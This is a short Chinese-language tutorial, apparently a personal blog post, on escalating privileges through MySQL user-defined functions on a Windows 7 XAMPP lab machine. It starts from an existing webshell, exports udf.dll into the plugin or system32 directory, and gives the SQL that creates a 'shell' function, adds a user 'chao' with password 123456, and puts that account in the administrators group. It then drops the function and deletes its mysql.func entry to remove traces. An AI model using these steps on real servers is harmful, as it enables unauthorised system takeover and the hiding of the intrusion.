mysql提权

为什么要提权？

当需要执行系统命令的时候，比如添加管理员，就需要提权

实验环境

虚拟机下win7  64位，使用xampp集成包，

条件：getshell

利用UDF提权

验证是否拿下网站

shell.php写有一句话木马

上传udf.php文件，进行访问

输入数据库的密码

数据库版本

mysql数据库版本在5.1以下的可以直接导出到默认位置，即

C:\\xampp\\mysql\\lib\\plugin\\\\udf.dll

mysql数据库版本为5.5.47，所以需要修改导出位置

C:\\windows\\system32\\\\udf.dll

导出成功

如果C:\\xampp\\mysql\\lib下没有plugin文件，可以通过中国菜刀新建plugin文件

copy

然后依次执行以下命令

网上的代码不知道怎么执行不了，发现没有cmdshell函数

后来发现竟然可以这样

CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'；

select   shell('cmd','net user chao 123456  /add');

select shell('cmd','net localgroup administrators chao /add');

drop   function   shell;//删除函数

delete from mysql.func where name='shell';//删除函数

添加管理员

我还发现竟然有帮助提示

各种函数

查看进程

关机的帮助命令

参考文章

https://www.waitalone.cn/mysql-tiquan-summary.html